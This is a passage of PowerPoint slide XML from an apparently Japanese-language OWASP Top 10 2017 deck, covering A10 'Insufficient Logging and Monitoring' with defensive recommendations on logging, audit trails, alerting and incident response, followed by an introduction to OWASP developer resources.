              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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ログイン、アクセス制御の失敗、サーバサイドの入力検証の失敗を全てログとして記録するようにする。ログは、不審なアカウントや悪意のあるアカウントを特定するために十分なユーザコンテキストを持ち、後日、フォレンジック分析を行うのに十分な期間分保持するようにす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82800" indent="-8280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統合ログ管理ソリューションで簡単に使用できる形式でログが生成されていることを確認する。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82800" indent="-8280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価値の高いトランザクションにおいて、監査証跡が取得されていること。その際、追記型データベースのテーブルなどのような、完全性を保つコントロールを用いて、改ざんや削除を防止する。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82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="2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疑わしい活動がタイムリーに検知されて対応されるように、効果的なモニタリングとアラートを確立する。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（またはそれ以降）のような、インシデント対応および復旧計画を策定または採用する。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP ModSecurity Core Rule Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を使用した</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>などの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリケーションファイアウォール、カスタムダッシュボードとアラートを使用したログ相関分析ソフトウェアなど、商用およびオープンソースのアプリケーション保護フレームワークがあります。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33"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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不十分なロギングとモニタリング</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1552968988"/>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a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de"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05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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de"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ja-JP" altLang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>不十分なロギングとモニタリングの悪用が、ほぼすべての重大なインシデントの背後にあります。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>モニタリングとタイムリーな対応の不備を突き、攻撃者は攻撃を検知されることなく目標を達成します。</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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>業界調査</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に基づいてこの問題は</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に追加されました。十分にモニタリングされているかどうかを判断するための方法の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>つは、ペネトレーションテスト後のログを調べることです。どのような損害を引き起すのかを理解するために、テスターの行動に対して十分なログが記録される必要があります。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>成功した攻撃の多くは脆弱性の下調べから始まります。このような下調べを見逃し続けることによって、脆弱性攻撃の成功率がほぼ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>％になる可能性があります。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2016</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>年には侵害を特定するのに</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>平均</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>191</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>日</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>という多くの時間がかかりました。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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1984534527"/>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849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b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>反復可能なセキュリティプロセスと標準セキュリティ制御の確立と使用</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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381463">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altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションのセキュリティに関して不慣れか、これらのリスクに既に非常に精通しているかにかかわらず、セキュアな</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションの構築や存在する脆弱性の修正は困難な場合があります。大規模なポートフォリオを管理しなければならない場合には、この作業はかなり気力をくじきます。組織や開発者がコスト効率を考慮しながら、アプリケーションのセキュリティリスクを減らせるように、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、組織でのアプリケーションセキュリティに着手するための数々の無料でオープンなリソースを開発しています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>セキュアな</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を構築するために</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>が開発してきた多くのリソースの一部を以下に示します。次のページでは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>のセキュリティを検証する際に、組織が活用できる</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の他のリソースを記載しています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="105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950" baseline="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950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>他にも数多くの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>の資料が入手できます。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>にアクセスしてください。そこで</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
